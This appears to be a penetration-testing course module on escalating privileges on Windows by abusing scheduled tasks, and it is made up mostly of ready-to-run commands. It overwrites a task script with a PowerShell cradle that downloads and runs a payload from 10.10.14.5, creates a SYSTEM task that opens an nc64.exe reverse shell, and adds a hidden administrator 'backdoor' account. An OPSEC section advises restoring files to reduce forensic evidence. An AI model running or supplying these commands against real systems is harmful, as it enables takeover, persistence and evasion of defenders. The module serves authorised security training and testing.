Back to All Modules

Scheduled Tasks Abuse

#Overview

Windows scheduled tasks execute commands at specified triggers with the privileges of their configured user account. When a scheduled task runs as SYSTEM or a high-privilege domain account and the underlying script or binary is writable by a low-privilege user, it becomes a privilege escalation vector. Scheduled tasks are the Windows equivalent of Linux cron jobs.

#Prerequisites

  • User-level shell access
  • Ability to read scheduled task configurations
  • Write access to a scheduled task's script, binary, or working directory

#Detection & Enumeration

rem List all scheduled tasks with verbose output
schtasks /query /fo LIST /v

rem Filter for tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr /i "SYSTEM"
schtasks /query /fo LIST /v | findstr /i "Task To Run"

rem PowerShell enumeration
Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM"} | Format-Table TaskName,State
Get-ScheduledTask | Get-ScheduledTaskInfo | Format-Table TaskName,LastRunTime,NextRunTime
CMD
# Find writable scripts/binaries used by scheduled tasks
# Combine with PowerUp for systematic checking
. .\PowerUp.ps1
Get-ModifiableScheduledTaskFile

# Manual check: for each scheduled task, check permissions on its action path
$taskPath = (Get-ScheduledTask -TaskName "VulnTask").Actions[0].Execute
icacls $taskPath
POWERSHELL

#Exploitation / Execution

#Writable Scheduled Task Scripts/Binaries

rem Check permissions on the task's executable
icacls "C:\Program Files\VulnApp\task_script.bat"
rem If W (write) or F (full) for your user:

rem Replace the script with a malicious one
echo powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/rev.ps1')" > "C:\Program Files\VulnApp\task_script.bat"

rem Wait for the task to trigger, or manually run if you have permission:
schtasks /run /tn "\VulnApp\VulnTask"

rem Check last run time to confirm:
schtasks /query /fo LIST /v /tn "\VulnApp\VulnTask" | findstr "Last Run Time"
CMD

#Scheduled Task Trigger Analysis

rem View all triggers for a task
schtasks /query /fo LIST /v /tn "\TaskName"

rem Key trigger types:
rem - At logon: runs when any user logs on
rem - At startup: runs at system boot
rem - Daily/Weekly: runs at specific times
rem - On event: runs on specific event log entries

rem Tasks with "At logon" triggers are ideal -- log off and log back on to trigger
rem Tasks with "At startup" require a system reboot or shutdown /r /t 0
CMD

#Custom Task Creation with SYSTEM Privileges

When you have permissions to create new tasks:

rem Create a task that runs as SYSTEM immediately
schtasks /create /tn "Privesc" /tr "C:\Windows\Temp\nc64.exe 10.10.14.5 4444 -e cmd" /sc ONCE /st 00:00 /ru SYSTEM /f
schtasks /run /tn "Privesc"

rem Create a task that runs at next logon (as SYSTEM)
schtasks /create /tn "LogonTask" /tr "cmd.exe /c net user backdoor Password123! /add && net localgroup administrators backdoor /add" /sc ONLOGON /ru SYSTEM
rem Log off and back on
CMD

#Writable Working Directory

When the task's working directory is writable:

rem Some tasks reference DLLs relative to their working directory
rem If working dir is writable, you can DLL hijack the task

rem Check task's working directory
schtasks /query /fo LIST /v /tn "\TaskName" | findstr "Start In"

rem Or check the binary's directory
icacls "C:\Program Files\VulnApp"
rem If writable, create a malicious DLL in that directory
CMD

#CVE-2021-36942 (Task Scheduler DLL Injection)

This vulnerability allowed DLL injection into the Task Scheduler service itself:

# Affected Windows versions where Task Scheduler loads DLLs from writable locations
# Check for writable directories in Task Scheduler's DLL search path
POWERSHELL

#Common Pitfalls

  • Assuming schtasks returns ALL tasks -- some tasks are stored in registry or configured via Task Scheduler XML
  • Not checking task trigger schedules -- a task set to run at 3 AM on Sundays may not trigger during your engagement
  • Writable scripts that run as SYSTEM but are in directories with proper ACLs -- check every parent directory
  • Reboot required for "At startup" triggers -- ensure you have SeShutdownPrivilege
  • Task modification may be reverted by Group Policy (GPO) -- check if the task is GPO-managed

#OPSEC Considerations

  • Querying scheduled tasks is normal system administration behavior.
  • Creating new tasks or modifying existing ones generates event log entries (event ID 106/140/141 in TaskScheduler log).
  • Replacing executables for scheduled tasks is detected by file integrity monitoring.
  • Tasks running nc64.exe or reverse shell commands are immediately suspicious and may trigger AV.
  • Restoring original files after exploitation reduces forensic evidence.

#Post-Exploitation Value

Scheduled task abuse provides persistent SYSTEM access because tasks can survive reboots. Tasks running as domain accounts with elevated privileges enable lateral movement. Custom SYSTEM tasks can execute credential dumpers, install backdoors, or disable security controls.

#Cross-References

#Tool References

ToolLink
PowerUp.ps1https://github.com/PowerShellMafia/PowerSploit

#Source Machines

  • Generic Windows - Scheduled tasks with writable scripts running as SYSTEM